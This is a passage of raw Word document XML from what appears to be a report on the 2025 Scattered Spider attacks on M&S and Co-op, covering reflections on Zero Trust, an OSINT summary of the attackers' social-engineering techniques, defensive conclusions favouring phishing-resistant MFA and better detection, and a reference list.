          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.1 Critical Reflection on Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B157E3B" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>It is important to acknowledge that technical recommendations, however well-evidenced, are insufficient in isolation. Ross et al. [21] argue that cybersecurity programme effectiveness is fundamentally determined by executive sponsorship and risk appetite, not technical capability alone. The M&amp;S and Co-op incidents suggest that board-level investment in identity security had not kept pace with the threat landscape — a governance failure that technical controls cannot compensate for without corresponding organisational commitment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12988237" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00316BC8" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FC83737" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Furthermore, Zero Trust Architecture adoption represents a multi-year transformation programme rather than a discrete technical deployment. Organisations risk implementing ZTA superficially — applying the label without the underlying architectural rigour — a phenomenon that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Kindervag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> [22] terms 'Zero Trust theatre'. Genuine ZTA implementation requires alignment across network architecture, identity management, application security, and data classification — a cross-functional undertaking that demands sustained investment and organisational change management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B2F295" w14:textId="77777777" w:rsidR="005D6E7E" w:rsidRDefault="005F7F11" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F7F11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OSINT Summary</w:t>
      </w:r>
      <w:r w:rsidRPr="005F7F11">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E749901" w14:textId="1972DDC8" w:rsidR="005F7F11" w:rsidRPr="005D6E7E" w:rsidRDefault="005F7F11" w:rsidP="005D6E7E">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F7F11">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D6E7E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidRPr="005F7F11">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>2025 saw M&amp;S and Coop fall victim to Scattered Spider as detailed by the BBC News and FT. 300m in online sales were affected in M&amp;S. From</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F7F11">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">OSINT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F7F11">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>sources(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F7F11">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">NCSC, CrowdStrike, MSTIC, CISA) it has been ascertained that this group employed vishing techniques, credentials reset, </w:t>
      </w:r>
      <w:r w:rsidRPr="005F7F11">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>valid account</w:t>
      </w:r>
      <w:r w:rsidRPr="005F7F11">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> abuse, MFA fatigue, PowerShell/LOLBins, network scanning, and lateral movement. Detection was slow at both organisations, although Coop recuperated far more quickly. Public recommendations have suggested that failure was primarily down to poor MFA, helpdesk verification procedures and network segmentation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFB44DF" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00316BC8" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="488DFDA5" w14:textId="2C24727C" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A488C98" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">The Scattered Spider attacks on M&amp;S and Co-op in 2025 represent a defining case study in identity-driven </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>cyber attacks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> — demonstrating that a determined, socially sophisticated adversary can circumvent technically robust perimeter controls by exploiting the human layer. The critical analysis presented in this report yields three overarching conclusions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C465B0B" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00316BC8" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="521F74D6" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Conventional MFA is demonstrably insufficient for high-assurance environments. The empirical evidence from these incidents — combined with CISA advisory AA23-271A [6] and NIST SP 800-63B [14] — mandates a transition to phishing-resistant FIDO2 authentication as a baseline control for privileged access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD2064B" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection maturity is as important as prevention. Both organisations suffered disproportionate impact because intrusions were detected at the Impact phase rather than during Initial Access. Investment in UEBA, SIEM tuning, and participation in threat intelligence sharing programmes (NCSC </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>CiSP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>) represents the highest-leverage detection improvement available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634828D6" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Organisational resilience requires systemic, not merely technical, change. The success of social engineering attacks reflects cultural and governance failures — inadequate helpdesk verification procedures, insufficient security awareness training, and the absence of board-level identity security strategy — that technology alone cannot remediate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62537F6B" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00316BC8" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="384C185E" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>These findings resonate beyond the retail sector: as Schneier [23] observes, 'security is not a product, but a process' — one that demands continuous adaptation to an evolving threat landscape in which identity has become the primary attack surface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4FA896" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00316BC8" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="465B8AA5" w14:textId="6F9915C6" w:rsidR="00316BC8" w:rsidRPr="00605995" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00605995">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E2AD2A" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:ind w:left="720" w:hanging="720"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[1] BBC News, 'M&amp;S </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cyber attack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: What we know so far,' BBC News Online, Apr. 2025. [Online]. Available: https://www.bbc.co.uk/news/technology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5319FA33" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:ind w:left="720" w:hanging="720"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[2] Financial Times, 'Marks &amp; Spencer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cyber attack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> costs rise above £300m,' Financial Times, May 2025.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A05D7B" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:ind w:left="720" w:hanging="720"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[3] National Cyber Security Centre (NCSC), 'NCSC Annual Review 2024,' NCSC, London, UK, 2024. [Online]. Available: https://www.ncsc.gov.uk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712F0130" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:ind w:left="720" w:hanging="720"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[4] CrowdStrike, 'Scattered Spider: Adversary Profile and Threat Intelligence,' CrowdStrike Intelligence Report, 2024.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334D6F8C" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:ind w:left="720" w:hanging="720"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[5] Microsoft Security Threat Intelligence (MSTIC), 'Octo Tempest crosses boundaries to facilitate extortion, encryption, and destruction,' Microsoft Security Blog, Oct. 2023. [Online]. Available: https://www.microsoft.com/en-us/security/blog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBD10EC" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:ind w:left="720" w:hanging="720"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[6] Cybersecurity and Infrastructure Security Agency (CISA), 'Scattered Spider Advisory — AA23-271A,' CISA, Sep. 2023. [Online]. Available: https://www.cisa.gov</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3EF704" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:ind w:left="720" w:hanging="720"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[7] Mandiant, 'UNC3944: SMS Phishing and SIM Swapping for Ransomware and Extortion,' Mandiant Threat Research, 2023.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569720A7" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:ind w:left="720" w:hanging="720"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[8] Palo Alto Networks Unit 42, 'Muddled Libra: Threat Actor Overview,' Palo Alto Networks, 2023. [Online]. Available: https://unit42.paloaltonetworks.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECC9C74" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:ind w:left="720" w:hanging="720"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[9] S. Rose, O. Borchert, S. Mitchell, and S. Connelly, 'Zero Trust Architecture,' NIST Special Publication 800-207, National Institute of Standards and Technology, Aug. 2020.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9AFCAA"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[10] MITRE Corporation, 'MITRE ATT&amp;CK Framework v14,' The MITRE Corporation, 2024. [Online]. Available: https://attack.mitre.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DBB63C"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[11] Verizon, '2024 Data Breach Investigations Report (DBIR),' Verizon Business, 2024. [Online]. Available: https://www.verizon.com/business/resources/reports/dbir/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EB09A4"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[12] K. D. Mitnick and W. L. Simon, The Art of Deception: Controlling the Human Element of Security. Indianapolis, IN: Wiley, 2002.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DDBD83"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[13] R. Anderson, Security Engineering: A Guide to Building Dependable Distributed Systems, 3rd ed. Indianapolis, IN: Wiley, 2020.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BBF167" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:ind w:left="720" w:hanging="720"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[14] P. Grassi et al., 'Digital Identity Guidelines: Authentication and Lifecycle Management,' NIST Special Publication 800-63B, Jun. 2017.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A28D9B4"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[15] Ponemon Institute, 'Cost of a Data Breach Report 2024,' IBM Security / Ponemon Institute, 2024.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C34ADB4"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[16] J. H. Saltzer and M. D. Schroeder, 'The Protection of Information in Computer Systems,' Proceedings of the IEEE, vol. 63, no. 9, pp. 1278–1308, Sep. 1975.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF887AB"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[17] PCI Security Standards Council, 'Payment Card Industry Data Security Standard (PCI DSS) v4.0,' PCI SSC, Mar. 2022.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78796437"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[18] M. Workman, '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Wisecrackers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: A Theory-Grounded Investigation of Phishing and Pretext Social Engineering Threats to Information Security,' Journal of the American Society for Information Science and Technology, vol. 59, no. 4, pp. 662–674, 2008.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64067B8D" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:ind w:left="720" w:hanging="720"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[19] R. B. Cialdini, Influence: The Psychology of Persuasion, revised ed. New York, NY: Harper Business, 2007.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BECDE0" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:ind w:left="720" w:hanging="720"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[20] P. Cichonski, T. Millar, T. Grance, and K. Scarfone, 'Computer Security Incident Handling Guide,' NIST Special Publication 800-61 Revision 2, Aug. 2012.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DECFBAB" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:ind w:left="720" w:hanging="720"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[21] R. Ross et al., 'Developing Cyber-Resilient Systems,' NIST Special Publication 800-160 Vol. 2, Nov. 2021.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277F9B2D" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:ind w:left="720" w:hanging="720"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[22] J. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Kindervag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">, 'No More Chewy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Centers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Introducing the Zero Trust Model of Information Security,' Forrester Research, 2010.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6570CED5" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:ind w:left="720" w:hanging="720"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[23] B. Schneier, Secrets and Lies: Digital Security in a Networked World. Indianapolis, IN: Wiley, 2004.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BBB824" w14:textId="77777777" w:rsidR="00415EF6" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
